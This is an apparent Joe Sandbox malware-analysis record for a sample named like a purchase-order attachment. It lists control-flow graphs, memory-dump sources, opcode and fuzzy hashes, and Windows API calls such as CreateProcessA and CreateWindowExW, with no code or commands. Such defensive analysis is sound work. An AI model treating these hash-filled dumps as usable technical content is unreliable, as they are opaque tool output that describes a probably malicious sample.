                                                                                                                                              control_flow_graph 1300 c468cb8-c468cd7 1301 c468e02-c468e27 1300->1301 1302 c468cdd-c468cfd call c46761c 1300->1302 1310 c468e2e-c468e5a 1301->1310 1306 c468cff-c468d02 1302->1306 1307 c468d0d-c468d16 1302->1307 1306->1307 1308 c468d04-c468d07 1306->1308 1367 c468d18 call c468ca8 1307->1367 1368 c468d18 call c468cb8 1307->1368 1308->1307 1308->1310 1336 c468e61 1310->1336 1311 c468d1e-c468d20 1313 c468d26-c468d36 1311->1313 1314 c468df5-c468dff 1311->1314 1315 c468d3f-c468d44 1313->1315 1316 c468d38-c468d3d 1313->1316 1319 c468d46-c468d52 1315->1319 1320 c468d54-c468d59 1315->1320 1318 c468d6f-c468d97 call c467628 1316->1318 1326 c468e66-c468eb2 call c467644 1318->1326 1327 c468d9d-c468db0 1318->1327 1319->1318 1322 c468d6a-c468d6c 1320->1322 1323 c468d5b-c468d68 1320->1323 1322->1318 1323->1318 1335 c468eb7-c468ec2 1326->1335 1333 c468db2-c468def 1327->1333 1334 c468df1-c468df3 1327->1334 1333->1334 1334->1314 1334->1336 1337 c468fbc 1335->1337 1338 c468ec8-c468ed9 1335->1338 1336->1326 1340 c468fc1-c468fc5 1337->1340 1345 c468edf-c468f27 call c467650 1338->1345 1346 c468f89-c468fb5 1338->1346 1343 c468fc7-c468fd6 1340->1343 1344 c468fd9 1340->1344 1343->1344 1361 c468f50-c468f54 1345->1361 1362 c468f29-c468f4e 1345->1362 1346->1337 1363 c468f56-c468f68 call c467650 1361->1363 1364 c468f6d-c468f87 1361->1364 1362->1340 1363->1364 1364->1340 1367->1311 1368->1311
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $(&^q$(bq$Hbq
                                                                                                                                              • API String ID: 0-1723523991
                                                                                                                                              • Opcode ID: 9acf003d5c3e79425501b1d58f9dd67d7dabe7041bc439280c3dae43652bf987
                                                                                                                                              • Instruction ID: eaef8d929fdb54cc631f0471006509d353db4dbbd076c44bb01f188da8b0b0ba
                                                                                                                                              • Opcode Fuzzy Hash: 9acf003d5c3e79425501b1d58f9dd67d7dabe7041bc439280c3dae43652bf987
                                                                                                                                              • Instruction Fuzzy Hash: 5C917C70F002199FDB18DF79C844AAFBBF6FB88310F10852AE405EB794DB3499458BA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1693 751a6f8-751a76d 1694 751a773-751a780 1693->1694 1695 751ac55-751acbe call 7512990 1693->1695 1698 751acc5-751ad1c call 7512990 1694->1698 1699 751a786-751a790 1694->1699 1695->1698 1704 751ad23-751ad7a call 7512990 1698->1704 1699->1704 1705 751a796-751a7a0 1699->1705 1707 751ad81-751add8 call 7512990 1704->1707 1705->1707 1708 751a7a6-751a7b0 1705->1708 1712 751addf-751ae3c call 7512990 1707->1712 1711 751a7b6-751a7bd 1708->1711 1708->1712 1719 751ae43-751aeb1 call 7512b18 1711->1719 1720 751a7c3-751a7c7 1711->1720 1712->1719 1786 751aeb3-751aeb7 1719->1786 1787 751aeb9-751aebb 1719->1787 1724 751a7c9-751a7fe 1720->1724 1725 751a81e-751a872 call 7519350 call 7519360 GetCapture 1720->1725 1724->1725 1752 751a800-751a80f 1724->1752 1749 751a874-751a87a 1725->1749 1750 751a87b-751a889 1725->1750 1749->1750 1756 751a8b5-751a8ea GetActiveWindow 1750->1756 1757 751a88b-751a8b0 call 7513368 call 7519370 1750->1757 1752->1725 1770 751a811-751a81b call 7519340 1752->1770 1765 751a8f3-751a904 1756->1765 1766 751a8ec-751a8f2 1756->1766 1757->1756 1773 751a913 1765->1773 1774 751a906-751a911 1765->1774 1766->1765 1770->1725 1775 751a916-751a948 1773->1775 1774->1775 1792 751a94a-751a950 1775->1792 1793 751a95d-751a980 1775->1793 1788 751aec0-751aece 1786->1788 1787->1788 1792->1793 1794 751a952-751a958 call 751937c 1792->1794 1798 751a986-751a990 1793->1798 1799 751aa48-751aa52 1793->1799 1794->1793 1798->1799 1804 751a996-751a9c9 1798->1804 1800 751aa54-751aa57 call 751af21 1799->1800 1801 751aa5d-751aa80 1799->1801 1800->1801 1807 751aa82-751aa85 1801->1807 1808 751aa88-751aa96 1801->1808 1811 751ab9b-751ac2a call 7512990 call 751937c 1804->1811 1812 751a9cf-751aa3e 1804->1812 1807->1808 1813 751aa98-751aaa6 1808->1813 1814 751aacc-751aada 1808->1814 1811->1695 1812->1799 1813->1814 1819 751aaa8-751aaca call 751938c 1813->1819 1820 751aaf8-751aaff 1814->1820 1821 751aadc-751aaea 1814->1821 1819->1820 1859 751ab05 call 751fc98 1820->1859 1860 751ab05 call 751fc88 1820->1860 1821->1820 1829 751aaec-751aaf3 call 751938c 1821->1829 1827 751ab08-751ab18 1833 751ab1a-751ab24 1827->1833 1834 751ab6d-751ab7c 1827->1834 1829->1820 1840 751ab62-751ab67 1833->1840 1841 751ab26-751ab39 call 7519398 1833->1841 1834->1811 1856 751ab6a call b88619c 1840->1856 1857 751ab6a call b885f20 1840->1857 1858 751ab6a call b885ef0 1840->1858 1841->1840 1848 751ab3b-751ab5b 1841->1848 1848->1840 1856->1834 1857->1834 1858->1834 1859->1827 1860->1827
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ActiveCaptureWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2424615356-0
                                                                                                                                              • Opcode ID: 93d2cf7845de29d65b0ca095a48c93cc50e2e34ddb181bdc0f468826e07a26e5
                                                                                                                                              • Instruction ID: 7192fb96ff04bd00d0a5e3b0b1f5ceae08675e5f19d19c78a92c8b2adb10c0d1
                                                                                                                                              • Opcode Fuzzy Hash: 93d2cf7845de29d65b0ca095a48c93cc50e2e34ddb181bdc0f468826e07a26e5
                                                                                                                                              • Instruction Fuzzy Hash: 4CD1F9B4E00249CFEB25DFB5C554ADDBBB2BF89301F24826AE505AB261DB749981CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a338dc434bf61160b33124f93f20a37869088cc0173a02971d46c89215277ea
                                                                                                                                              • Instruction ID: 5fddc425e367233d3fcc89971f445d9ccd7aad926ac40e9338c3eb044dd4cd72
                                                                                                                                              • Opcode Fuzzy Hash: 8a338dc434bf61160b33124f93f20a37869088cc0173a02971d46c89215277ea
                                                                                                                                              • Instruction Fuzzy Hash: 0CD11970A00209CFDB14DFA5C948FEEBBF1BF44305F16856AE405AB769DB70A985CB42
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LR^q
                                                                                                                                              • API String ID: 0-2625958711
                                                                                                                                              • Opcode ID: daef0db928d699ab9d3b7ffdb81154f34bdea210fd2accf6cbce68544f27bb41
                                                                                                                                              • Instruction ID: 2efbf473ea883585c2524dbfd071b9424134e463d5766003fc335c8d4e112d2d
                                                                                                                                              • Opcode Fuzzy Hash: daef0db928d699ab9d3b7ffdb81154f34bdea210fd2accf6cbce68544f27bb41
                                                                                                                                              • Instruction Fuzzy Hash: 57323874A002198FDB58EB28C9557EEB7F2AF88700F1481A8D50D9B3A5DF349D82CF91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q
                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                              • Opcode ID: d2a3853059cf5e79c5f6238d49268c2bb68e1e2f3f4d95c336ae54e3c049ff43
                                                                                                                                              • Instruction ID: cfa0048911db91a9c62b4132e0a758b96585a5499b87fcb1427c69098ecdc4b7
                                                                                                                                              • Opcode Fuzzy Hash: d2a3853059cf5e79c5f6238d49268c2bb68e1e2f3f4d95c336ae54e3c049ff43
                                                                                                                                              • Instruction Fuzzy Hash: 6042F874A00218CFCB18DB28C995AE9B7F2FF89701F1541E9D509AB3A5DB31AD81CF91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Hbq
                                                                                                                                              • API String ID: 0-1245868
                                                                                                                                              • Opcode ID: a57306e472711efa27eb3945a1a8988bcd6a7816e985a30c8a76e9debb156793
                                                                                                                                              • Instruction ID: f0e3381534112068b6013e78f5e34bf7284974b294a3665ba5bae3771b77c7e0
                                                                                                                                              • Opcode Fuzzy Hash: a57306e472711efa27eb3945a1a8988bcd6a7816e985a30c8a76e9debb156793
                                                                                                                                              • Instruction Fuzzy Hash: D4E18C357016408FDB25EB79C8507AEB7F6AF89700F24446AD149CB6A1DF39DD02CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                              • Opcode ID: 6bd58e3bd554980fd69f6cc36790fb8dafda4367572a472048739f6665a059bd
                                                                                                                                              • Instruction ID: 7c037f85be6b33ea8541b07c503e5bdfb3953ec286f58b3682862b86b1e477e0
                                                                                                                                              • Opcode Fuzzy Hash: 6bd58e3bd554980fd69f6cc36790fb8dafda4367572a472048739f6665a059bd
                                                                                                                                              • Instruction Fuzzy Hash: 39021C71E0021ACFEB54EB64CC54BDDB7B2BF89301F11869AD109A7290EF70AA85CF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d643062e8d704abb09cf06c77ac0c0312364927866c40a7879952f0389e4d20
                                                                                                                                              • Instruction ID: 07d480220b75db9de50ee7be2918e391c44a10d1cf9951608a8f12f2b13475a9
                                                                                                                                              • Opcode Fuzzy Hash: 3d643062e8d704abb09cf06c77ac0c0312364927866c40a7879952f0389e4d20
                                                                                                                                              • Instruction Fuzzy Hash: C4525B35A01619CFCB21DF65C844AE9B7F2FF49305F1485DAE409AB265EB31EA82CF41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c469f044220be96a3791755bf2107256daf2aa4d4c40018ce811da5882ffb788
                                                                                                                                              • Instruction ID: ae4aaac2642ff3eeeb27e948076846e9a7a1043f0252d215ab46815b9b80d1a7
                                                                                                                                              • Opcode Fuzzy Hash: c469f044220be96a3791755bf2107256daf2aa4d4c40018ce811da5882ffb788
                                                                                                                                              • Instruction Fuzzy Hash: DB324A35A00619CFDB21EF65C944BD9B7B2FF49304F1485E9E409AB261EB71EA85CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7e10118b30b730c0de5c67d28c33fd3d7aa2f0af4ac2da81b4bfddb7876eadcc
                                                                                                                                              • Instruction ID: ce9f95ff154958bf96e41550118a115a0c3561b64b36d0150fb490be6743e497
                                                                                                                                              • Opcode Fuzzy Hash: 7e10118b30b730c0de5c67d28c33fd3d7aa2f0af4ac2da81b4bfddb7876eadcc
                                                                                                                                              • Instruction Fuzzy Hash: BFC18EB2D002298FCB55CFA5C88079DBBF2BF88310F15C26AD449AB255DB70D986DF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 827f56bce35b3461d0dd8b1801c82fda237f705868a288d47b9d6d2f7b3470e9
                                                                                                                                              • Instruction ID: 58a0c2f18eb6e224fccdc9d85273f2579e34307799e8c3f03308d3710d456c28
                                                                                                                                              • Opcode Fuzzy Hash: 827f56bce35b3461d0dd8b1801c82fda237f705868a288d47b9d6d2f7b3470e9
                                                                                                                                              • Instruction Fuzzy Hash: 31E0E53895920CDFCB54AF84E5486F8BBB9BB4E715F1034A1D42EE3221DB755A88DE04
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da84d2eff485ff425f167bbed26a939f31e7bba4a78daef3ec3079f15cd90cb9
                                                                                                                                              • Instruction ID: f4918c8785ca63c449a7ee17f9377b350e4549b871a165b1b13ea77c2735271b
                                                                                                                                              • Opcode Fuzzy Hash: da84d2eff485ff425f167bbed26a939f31e7bba4a78daef3ec3079f15cd90cb9
                                                                                                                                              • Instruction Fuzzy Hash: 46E09A3894D24CDFCB40AAA4A1481F8BFB9A74B615F5430A2C12DD3212DB3445048B19

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1184 f9d149-f9d1e7 GetCurrentProcess 1188 f9d1e9-f9d1ef 1184->1188 1189 f9d1f0-f9d224 GetCurrentThread 1184->1189 1188->1189 1190 f9d22d-f9d261 GetCurrentProcess 1189->1190 1191 f9d226-f9d22c 1189->1191 1193 f9d26a-f9d285 call f9d328 1190->1193 1194 f9d263-f9d269 1190->1194 1191->1190 1197 f9d28b-f9d2ba GetCurrentThreadId 1193->1197 1194->1193 1198 f9d2bc-f9d2c2 1197->1198 1199 f9d2c3-f9d325 1197->1199 1198->1199
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00F9D1D6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00F9D213
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00F9D250
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00F9D2A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: 3accab9dbb0d79a9efe34641c645995354c6cde0100c93c5f9d83877d0c7e4df
                                                                                                                                              • Instruction ID: 24786d20deec8a066606e0c1f74de7260c3a76ee58202ca2354f371c1dd70b26
                                                                                                                                              • Opcode Fuzzy Hash: 3accab9dbb0d79a9efe34641c645995354c6cde0100c93c5f9d83877d0c7e4df
                                                                                                                                              • Instruction Fuzzy Hash: 865175B0D003098FDB54DFAAD548BDEBBF1EF88314F208459E019A72A1CB349985CF65

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1206 f9d158-f9d1e7 GetCurrentProcess 1210 f9d1e9-f9d1ef 1206->1210 1211 f9d1f0-f9d224 GetCurrentThread 1206->1211 1210->1211 1212 f9d22d-f9d261 GetCurrentProcess 1211->1212 1213 f9d226-f9d22c 1211->1213 1215 f9d26a-f9d285 call f9d328 1212->1215 1216 f9d263-f9d269 1212->1216 1213->1212 1219 f9d28b-f9d2ba GetCurrentThreadId 1215->1219 1216->1215 1220 f9d2bc-f9d2c2 1219->1220 1221 f9d2c3-f9d325 1219->1221 1220->1221
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00F9D1D6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00F9D213
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00F9D250
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00F9D2A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: 5c1b18c4b80580c4bb06ab99b7fe22243e6dbd58ec80e5019b36c9cbbe46d2e6
                                                                                                                                              • Instruction ID: 172ac4a10263d298000c2a1fd1ad36c7ebd246b2be42a87acb49869182becdc1
                                                                                                                                              • Opcode Fuzzy Hash: 5c1b18c4b80580c4bb06ab99b7fe22243e6dbd58ec80e5019b36c9cbbe46d2e6
                                                                                                                                              • Instruction Fuzzy Hash: 985156B0D013098FDB14DFAAD548B9EBBF1EF88314F208469E019A73A0DB749985CF65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 033a7474cec36d7621dbb8a8cabcc91bf11ceee4e4c41850c545a0f38f063524
                                                                                                                                              • Instruction ID: 2fa355e5a66004948a42e00724629f239694f00cf9b33bd0bd95d4be598c2b1f
                                                                                                                                              • Opcode Fuzzy Hash: 033a7474cec36d7621dbb8a8cabcc91bf11ceee4e4c41850c545a0f38f063524
                                                                                                                                              • Instruction Fuzzy Hash: DE222B74E00645CFDB24DB58C58CABEBBB2EB94B10F2480E6D915A7265CB3CD881CF91
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0710D2CE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 4bc2115cc236c967d3f0f70ef8e3e29744e39cc08bc61441a6cdbae01475dd66
                                                                                                                                              • Instruction ID: 8fd79a5be4e9b94cbc377792d960a93eccf36cad598278499eb874695b04920e
                                                                                                                                              • Opcode Fuzzy Hash: 4bc2115cc236c967d3f0f70ef8e3e29744e39cc08bc61441a6cdbae01475dd66
                                                                                                                                              • Instruction Fuzzy Hash: D7914FB1E00219DFDB15DFA8D8417DDBBB2BF48314F1481A9E848A72D0DB749985CF92
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: b91b415dfe2a069b5272cfbceef2081b2f154ae8e62195d47244304c0ca1833d
                                                                                                                                              • Instruction ID: 14c3b9a7b8ac2af3bc93a1103dbaf993c6d2294c18336c0f240339dbf23fa51d
                                                                                                                                              • Opcode Fuzzy Hash: b91b415dfe2a069b5272cfbceef2081b2f154ae8e62195d47244304c0ca1833d
                                                                                                                                              • Instruction Fuzzy Hash: D47154B0A00B058FEB24DF29D15576ABBF1BF88314F00892DE08AD7A50DB75E849DF91
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03B8412C,02BA094C,?,00000000), ref: 02B6BF46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 6d8d962eb0c8ef011b6809f59dc9e743eca82e22da10b70fa3065b16307bbbfe
                                                                                                                                              • Instruction ID: 7a129c27c99ff6da88c1e4650271c5f021a29121bb48a4acca9c8f319507006a
                                                                                                                                              • Opcode Fuzzy Hash: 6d8d962eb0c8ef011b6809f59dc9e743eca82e22da10b70fa3065b16307bbbfe
                                                                                                                                              • Instruction Fuzzy Hash: DF719134A01208AFCB15DFA8D898EAEBBB2FF49714F114499F901AB361D735E881CF50
                                                                                                                                              APIs
                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B61E02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                              • Opcode ID: 551e51da9829c14d66360a2b544b87e6b9afe0f0604815987176cce71a4e71ac
                                                                                                                                              • Instruction ID: 2c6cf2fd123dbaccb8e4052bf73ff6857ad5a11d51f86c135ef2415c7993146f
                                                                                                                                              • Opcode Fuzzy Hash: 551e51da9829c14d66360a2b544b87e6b9afe0f0604815987176cce71a4e71ac
                                                                                                                                              • Instruction Fuzzy Hash: 1651CEB1D103499FDB14CFA9C884ADEBBB5FF88314F24816AE818AB310D7759945CF90
                                                                                                                                              APIs
                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B61E02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                              • Opcode ID: 0b373b460bbb7e0ff779dfcb9f163fcd5043f88be874e81471385b491fa81368
                                                                                                                                              • Instruction ID: 63dbbaa144f182c4ce52476906b2504fbcfe6b13411920f5bba9c8587010576e
                                                                                                                                              • Opcode Fuzzy Hash: 0b373b460bbb7e0ff779dfcb9f163fcd5043f88be874e81471385b491fa81368
                                                                                                                                              • Instruction Fuzzy Hash: 1941CEB1D103099FDB14CFA9C984ADEBBB5FF48314F24816AE818AB310D7759885CF90
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Focus
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2734777837-0
                                                                                                                                              • Opcode ID: cf0597394d18dfc1e1f30783dc57d8bd209b0c41a7a05052ed0b250f79c80c42
                                                                                                                                              • Instruction ID: 46f44dd47519a8bb32def96a2f78b957a5f4090bcf860b82b649c1e0a9b48b2b
                                                                                                                                              • Opcode Fuzzy Hash: cf0597394d18dfc1e1f30783dc57d8bd209b0c41a7a05052ed0b250f79c80c42
                                                                                                                                              • Instruction Fuzzy Hash: D4319EB0A012568FEB109F69C445AAEBBB4BF48715F144459E815AB354CB75E841CBD0
                                                                                                                                              APIs
                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 02B64381
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                              • Opcode ID: 5535291fbaab4aa401d26202575120cecb2fc8e55f8d7829f2d1b3bc5a2de493
                                                                                                                                              • Instruction ID: cae4aba4961d2b70160057c581034b3f6125fcfa888b4ddfb63d120a6b6280b8
                                                                                                                                              • Opcode Fuzzy Hash: 5535291fbaab4aa401d26202575120cecb2fc8e55f8d7829f2d1b3bc5a2de493
                                                                                                                                              • Instruction Fuzzy Hash: BE4128B5A00705CFCB14DF99C448AAAFBF5FB88314F28C499E519AB321D774A845CFA0
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F959A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
